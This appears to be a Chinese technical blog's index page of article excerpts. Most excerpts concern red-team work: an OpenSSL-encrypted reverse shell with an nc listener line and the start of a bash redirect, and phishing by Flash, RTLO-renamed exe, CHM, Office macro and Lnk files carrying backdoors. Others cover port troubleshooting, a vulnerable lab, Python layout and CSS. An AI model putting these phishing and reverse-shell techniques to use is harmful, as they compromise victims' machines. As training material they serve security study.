摘要:
流量加密之:使用Openssl反弹加密shell 1 背景 直接反弹 shell 方式都有一个缺点:流量是以明文方式进行传输的。容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。 # kali配置nc监听 nc -nvlp 2333 # Centos主机反弹shell bash -i > 阅读全文
摘要:
钓鱼攻击之:Flash 网页钓鱼 1 准备资料 Flash网站克隆源码:GitHub - hackxc/xss_flash: Xss之Flash钓鱼 生成后门并捆绑flash的安装程序 VPS服务器,并使用步骤1的资源,搭建好flash网站,下载地址要修改为构造好的后门文件。 有XSS漏洞的网站:G 阅读全文
摘要:
钓鱼攻击之:文件钓鱼 MSF 和 CS 都可以生成反弹shell,通过鼠标点击的方式进行触发。exe后门用于钓鱼,主要解决的问题有三个: 后缀名隐藏 文件免杀 文件图标更换 1 RTLO伪装文件钓鱼 RTLO伪装文件解决后缀名隐藏问题 1.1 RTLO简介 RTLO字符全名为Right-To-Lef 阅读全文
摘要:
Win下依据端口排查步骤 今天突然发现自己电脑出现7680端口的内网连接,决定看看这个端口是做什么用的 1 排查步骤 确认7680端口连接情况与端口对应进程PID netstat -ano | findstr 7680 # 由下图可知 PID 为 21500 确认PID所对应进程 tasklist 阅读全文
摘要:
钓鱼攻击之:CHM电子书钓鱼 1 CHM简介 CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。因为使用方容便,形式多样也常被采用作为电子书的格式。而该类型的文件是可以用Windows自带 阅读全文
摘要:
钓鱼攻击之:OFFICE 宏后门文件钓鱼 1 宏病毒介绍 1.1 Word 宏 Word的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素:菜单、宏、格式(如备忘录等)。模板是文本、图形和格式编排的蓝图,对于某一类型的所有文档来说,文本、图像和格式编排都是 阅读全文
摘要:
钓鱼攻击之:Lnk 文件钓鱼 1 Lnk 钓鱼小试牛刀 利用技巧: 修改完成后,系统会自动根据所执行的程序更改图标,此时可以通过手动更改指定图标,让文件看起来无害。 创建一个Lnk(快捷方式)文件,然后修改它的目标地址如下: # powershell方式注入payload # 使用CS生成web投递 阅读全文
摘要:
LKWA靶机学习 1 下载地址 # 下载LKWA直接放在你的web服务器目录下即可运行 git clone https://github.com/weev3/LKWA # docker安装 docker pull kminthein/lkwa:latest docker run -ti -p 300 阅读全文
摘要:
目录结构 1 目的2 目录组织方式3 其他需要注意的地方:3.1 README3.2 setup.py3.3 requirements.txt3.4 配置的使用, 1 目的 **可读性高: **有助不熟悉这个项目的代码的人,快速的了解这个项目。 **可维护性高: **即使代码/配置的规模增加,项目结 阅读全文
摘要:
文本属性 1. 缩进和水平对齐1.1 缩进文本 2. 水平对齐2.1 justify2.2 text-align:center 与 ` ` 3. 垂直对齐3.1 行高3.2 构造文本行3.3 指定line-height 值 4. 垂直对齐文本4.1 基线对齐4.2 上标与下标4.3 底端对齐与顶 端 阅读全文